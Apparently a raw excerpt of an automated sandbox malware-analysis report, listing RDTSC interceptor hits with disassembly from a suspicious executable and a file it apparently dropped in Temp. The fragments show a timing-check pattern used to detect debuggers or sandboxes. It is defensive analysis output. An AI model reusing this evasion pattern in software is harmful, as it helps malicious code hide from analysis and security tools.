Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 000000000040428F second address: 0000000000404295 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000404295 second address: 00000000004042B3 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Eh 0x00000009 popad 0x0000000a popfd 0x0000000b mov ecx, dword ptr [ebp+08h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 00000000004042B3 second address: 00000000004042B9 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 00000000004042B9 second address: 00000000004042D8 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Fh 0x00000009 popad 0x0000000a popfd 0x0000000b add ecx, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 00000000004042D8 second address: 00000000004042DE instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 00000000004042DE second address: 0000000000404300 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825643h 0x00000009 popad 0x0000000a popfd 0x0000000b mov byte ptr [ecx], al 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000404300 second address: 0000000000404306 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000404306 second address: 0000000000404079 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Fh 0x00000009 popad 0x0000000a popfd 0x0000000b jmp 00007F47FC825387h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 0000000000404079 second address: 000000000040407F instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 000000000040407F second address: 000000000040409B instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Ch 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 000000000040409B second address: 00000000004040A1 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 00000000004040A1 second address: 00000000004040C1 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825640h 0x00000009 popad 0x0000000a popfd 0x0000000b add eax, 01h 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 00000000004040C1 second address: 00000000004040C7 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 00000000004040C7 second address: 00000000004040E8 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825641h 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], eax 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 00000000004040E8 second address: 00000000004040EE instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 00000000004040EE second address: 0000000000404109 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Eh 0x00000009 popad 0x0000000a popfd 0x0000000b pushfd 0x0000000c pushad 0x0000000d xor ecx, ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeRDTSC instruction interceptor: First address: 000000000040434E second address: 0000000000404354 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403BD4 second address: 0000000000403BDA instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403BDA second address: 0000000000403BFC instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FCB7E053h 0x00000009 popad 0x0000000a popfd 0x0000000b push 00000005h 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403BFC second address: 0000000000403C02 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403C02 second address: 0000000000403C23 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FCB7E04Fh 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, 00403F45h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403C23 second address: 0000000000403C29 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403C29 second address: 0000000000403C43 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FCB7E04Ch 0x00000009 popad 0x0000000a popfd 0x0000000b push eax 0x0000000c pushfd 0x0000000d pushad 0x0000000e xor ecx, ecx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403C43 second address: 0000000000403C49 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403C49 second address: 0000000000403C6C instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FCB7E051h 0x00000009 popad 0x0000000a popfd 0x0000000b push 000013C5h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403C6C second address: 0000000000403C72 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403C72 second address: 0000000000403C92 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FCB7E04Eh 0x00000009 popad 0x0000000a popfd 0x0000000b push 00404779h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403C92 second address: 0000000000403C98 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403C98 second address: 0000000000403CB7 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FCB7E04Dh 0x00000009 popad 0x0000000a popfd 0x0000000b mov ebx, 00403FA9h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403CB7 second address: 0000000000403CBD instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403CBD second address: 0000000000403FB0 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FCB7E04Fh 0x00000009 popad 0x0000000a popfd 0x0000000b call ebx 0x0000000d push ebp 0x0000000e mov ebp, esp 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403FB0 second address: 0000000000403FB6 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403FB6 second address: 0000000000403FD3 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FCB7E04Fh 0x00000009 popad 0x0000000a popfd 0x0000000b push ecx 0x0000000c pushfd 0x0000000d pushad 0x0000000e xor ecx, ecx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403FD3 second address: 0000000000403FD9 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403FD9 second address: 0000000000403FFC instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FCB7E04Fh 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], 00000000h 0x00000012 pushfd 0x00000013 pushad 0x00000014 xor ecx, ecx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403FFC second address: 0000000000404002 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000404002 second address: 0000000000404029 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FCB7E053h 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], 00000000h 0x00000012 pushfd 0x00000013 pushad 0x00000014 xor ecx, ecx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000404029 second address: 000000000040402F instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 000000000040402F second address: 0000000000404109 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FCB7E053h 0x00000009 popad 0x0000000a popfd 0x0000000b jmp 00007F47FCB7E0FAh 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000404109 second address: 000000000040410F instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 000000000040410F second address: 0000000000404137 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FCB7E04Fh 0x00000009 popad 0x0000000a popfd 0x0000000b mov ecx, dword ptr [ebp-04h] 0x0000000e cmp ecx, dword ptr [ebp+0Ch] 0x00000011 jnc 00007F47FCB7E25Dh 0x00000017 pushfd 0x00000018 pushad 0x00000019 xor ecx, ecx 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000404137 second address: 000000000040413D instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 000000000040413D second address: 0000000000404161 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FCB7E054h 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000404161 second address: 0000000000404167 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000404167 second address: 000000000040417F instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FCB7E049h 0x00000009 popad 0x0000000a popfd 0x0000000b xor edx, edx 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 000000000040417F second address: 0000000000404185 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000404185 second address: 00000000004041A9 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FCB7E054h 0x00000009 popad 0x0000000a popfd 0x0000000b div dword ptr [ebp+14h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004041A9 second address: 00000000004041AF instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004041AF second address: 00000000004041D6 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FCB7E057h 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp+10h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004041D6 second address: 00000000004041DC instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004041DC second address: 00000000004041F9 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FCB7E04Ch 0x00000009 popad 0x0000000a popfd 0x0000000b movsx ecx, byte ptr [eax+edx] 0x0000000f pushfd 0x00000010 pushad 0x00000011 xor ecx, ecx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004041F9 second address: 00000000004041FF instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004041FF second address: 0000000000404223 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FCB7E054h 0x00000009 popad 0x0000000a popfd 0x0000000b mov edx, dword ptr [ebp+08h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000404223 second address: 0000000000404229 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000404229 second address: 0000000000404245 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FCB7E04Ch 0x00000009 popad 0x0000000a popfd 0x0000000b add edx, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000404245 second address: 000000000040424B instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 000000000040424B second address: 000000000040426A instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FCB7E04Fh 0x00000009 popad 0x0000000a popfd 0x0000000b movzx eax, byte ptr [edx] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 000000000040426A second address: 0000000000404270 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000404270 second address: 000000000040428F instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FCB7E050h 0x00000009 popad 0x0000000a popfd 0x0000000b sub eax, ecx 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 000000000040428F second address: 0000000000404295 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000404295 second address: 00000000004042B3 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FCB7E04Eh 0x00000009 popad 0x0000000a popfd 0x0000000b mov ecx, dword ptr [ebp+08h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004042B3 second address: 00000000004042B9 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004042B9 second address: 00000000004042D8 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FCB7E04Fh 0x00000009 popad 0x0000000a popfd 0x0000000b add ecx, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004042D8 second address: 00000000004042DE instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004042DE second address: 0000000000404300 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FCB7E053h 0x00000009 popad 0x0000000a popfd 0x0000000b mov byte ptr [ecx], al 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000404300 second address: 0000000000404306 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000404306 second address: 0000000000404079 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FCB7E04Fh 0x00000009 popad 0x0000000a popfd 0x0000000b jmp 00007F47FCB7DD97h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000404079 second address: 000000000040407F instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 000000000040407F second address: 000000000040409B instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FCB7E04Ch 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 000000000040409B second address: 00000000004040A1 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004040A1 second address: 00000000004040C1 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FCB7E050h 0x00000009 popad 0x0000000a popfd 0x0000000b add eax, 01h 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004040C1 second address: 00000000004040C7 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004040C7 second address: 00000000004040E8 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FCB7E051h 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], eax 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004040E8 second address: 00000000004040EE instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004040EE second address: 0000000000404109 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FCB7E04Eh 0x00000009 popad 0x0000000a popfd 0x0000000b pushfd 0x0000000c pushad 0x0000000d xor ecx, ecx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 000000000040434E second address: 0000000000404354 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403BDA second address: 0000000000403BFC instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825643h 0x00000009 popad 0x0000000a popfd 0x0000000b push 00000005h 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403C02 second address: 0000000000403C23 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Fh 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, 00403F45h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403C29 second address: 0000000000403C43 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Ch 0x00000009 popad 0x0000000a popfd 0x0000000b push eax 0x0000000c pushfd 0x0000000d pushad 0x0000000e xor ecx, ecx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403C49 second address: 0000000000403C6C instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825641h 0x00000009 popad 0x0000000a popfd 0x0000000b push 000013C5h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403C72 second address: 0000000000403C92 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Eh 0x00000009 popad 0x0000000a popfd 0x0000000b push 00404779h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403C98 second address: 0000000000403CB7 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Dh 0x00000009 popad 0x0000000a popfd 0x0000000b mov ebx, 00403FA9h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
